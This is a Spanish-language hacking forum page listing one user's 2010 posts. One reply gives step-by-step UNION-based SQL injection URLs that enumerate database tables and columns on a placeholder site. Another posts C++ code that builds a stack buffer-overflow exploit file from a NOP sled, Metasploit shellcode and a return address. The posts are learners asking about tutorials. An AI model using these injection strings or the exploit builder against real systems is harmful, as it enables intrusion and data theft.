últimos mensajes de: soez

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 [8]

71	Seguridad Informática / Nivel Web / Re: [Problema en SQL Inyect]	en: 27 Abril 2010, 10:28 am
No se que numero te aparece cuando pones esto http://www.webVUL.com/xxx_xxx/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13-- si es el 2 por ejemplo para sacar las tablas seria http://www.webVUL.com/xxx_xxx/index.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables-- para sacar las columnas seria http://www.webVUL.com/xxx_xxx/index.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=char(nombre de la tabla en ascii separado por comas)-- ahi ya la tendras PD. Si no ves todos los nombres en la pantalla mira el codigo fuente

72	Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows	en: 26 Abril 2010, 03:16 am
Fijate bien, esta un poquito mas abajo del strcpy

73	Seguridad Informática / Análisis y Diseño de Malware / Re: [Taller] Así funcionan los crypters: cifrando malware a mano	en: 3 Abril 2010, 08:13 am
Muy buen tuto Hacker_Zero felicitaciones artista, estare pendiente del proximo. Saludos

74	Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows	en: 14 Febrero 2010, 20:08 pm
Vale xD muchas gracias Anon por las dudas ya me voy empapando a ver si le pego un segundo asalto y me termina de salir lo de la calculadora. Saludos!!

75	Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows	en: 14 Febrero 2010, 18:58 pm
Aun no me queda muy claro el retorno, el retorno es justo la direccion a la que apunta en cuanto se produce el overflow no?la que ponemos nosostros no? la direccion de retorno del programa normal de que sirviria? Saludos

76	Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows	en: 14 Febrero 2010, 18:28 pm
Lo sé de hecho con la funcion oculta la direccion de memoria a la que apuntaba era otra y fue la que puse y asi me salió, no lo he calcado y bueno siguiendo el tutorial si no he entendido mal habia que coger la direccion de la pila donde empieza el payload y asi lo he hecho como muestro en la imagen. La duda que tengo aparte de si se ve algun error en lo que hice, es que hay que meter el codigo de la accion que queremos lograr (payload si mal no entiendo) dentro del todo el shell code y por ultimo ponerle la direccion EIP=(ret) en el tuto de nuevo el trozo donde empieza el payload dentro del shell code con lo que queremos lograr cierto? Quiero decir que si el shell code esta compuesto de nops+payload+ret cuando ejecutamos el exploit se ejecutan los 3 y la direccion ret tiene que apuntar de nuevo al payload dentro del shell code no? Saludos PD. Aclararme si estoy equivocado en los conceptos

Seguridad Informática / Hacking / Re: [Manual] Buffer Overflow en Windows

en: 14 Febrero 2010, 17:41 pm

Ikary te felicito por el tuto!!

y bueno despues de hacer el tutorial en mi pc no me termina de salir :-/
Lo de que aparezca la funcion oculta si me sale, pero yo metiendole mi propio payload para calc.exe sacado de metasploit no me termina de salir, te pongo el codigo y alguna foto a ver si ves algo

Código:

#include <cstdlib>
#include <iostream>
#include <fstream>
using namespace std;

int main()
{
    char ret[] = "\x58\xFA\x22\x00";
    char nops[] = 
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x90\x90\x90\x90\x90\x90\x90\x90\x90";
                
    unsigned char shellcode[] =
                "\xdb\xcd\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x33\xbf\x0f\x5a\x74"
                "\xeb\x31\x7e\x17\x83\xc6\x04\x03\x71\x49\x96\x1e\x71\x85\xdf"
                "\xe1\x89\x56\x80\x68\x6c\x67\x92\x0f\xe5\xda\x22\x5b\xab\xd6"
                "\xc9\x09\x5f\x6c\xbf\x85\x50\xc5\x0a\xf0\x5f\xd6\xba\x3c\x33"
                "\x14\xdc\xc0\x49\x49\x3e\xf8\x82\x9c\x3f\x3d\xfe\x6f\x6d\x96"
                "\x75\xdd\x82\x93\xcb\xde\xa3\x73\x40\x5e\xdc\xf6\x96\x2b\x56"
                "\xf8\xc6\x84\xed\xb2\xfe\xaf\xaa\x62\xff\x7c\xa9\x5f\xb6\x09"
                "\x1a\x2b\x49\xd8\x52\xd4\x78\x24\x38\xeb\xb5\xa9\x40\x2b\x71"
                "\x52\x37\x47\x82\xef\x40\x9c\xf9\x2b\xc4\x01\x59\xbf\x7e\xe2"
                "\x58\x6c\x18\x61\x56\xd9\x6e\x2d\x7a\xdc\xa3\x45\x86\x55\x42"
                "\x8a\x0f\x2d\x61\x0e\x54\xf5\x08\x17\x30\x58\x34\x47\x9c\x05"
                "\x90\x03\x0e\x51\xa2\x49\x44\xa4\x26\xf4\x21\xa6\x38\xf7\x01"
                "\xcf\x09\x7c\xce\x88\x95\x57\xab\x69\x67\x6a\x21\xfd\xde\x1f"
                "\x08\x63\xe1\xf5\x4e\x9a\x62\xfc\x2e\x59\x7a\x75\x2b\x25\x3c"
                "\x65\x41\x36\xa9\x89\xf6\x37\xf8\xe9\x99\xab\x60\xc0\x3c\x4c"
                "\x02\x1c";


                  
    cout << "Creando exploit\n\n";
    ofstream fichero;
    fichero.open("archivo.txt");
    fichero << nops << shellcode << ret ;
    fichero.close();
    cout << "ya esta!!!";

    return 0;
}

El programa vulnerable es el mismo que el del tutorial, vamos que con 316 caracteres deberia llegar al EIP sin embargo...

PD. El ret es la direccion de memoria donde empieza el shell code no? Digamos que hace como un pequeño loop para ejecutarse? Saludos y gracias

PD2. 89 nops y 227 tamaño del shell code

Páginas: 1 2 3 4 5 6 7 [8]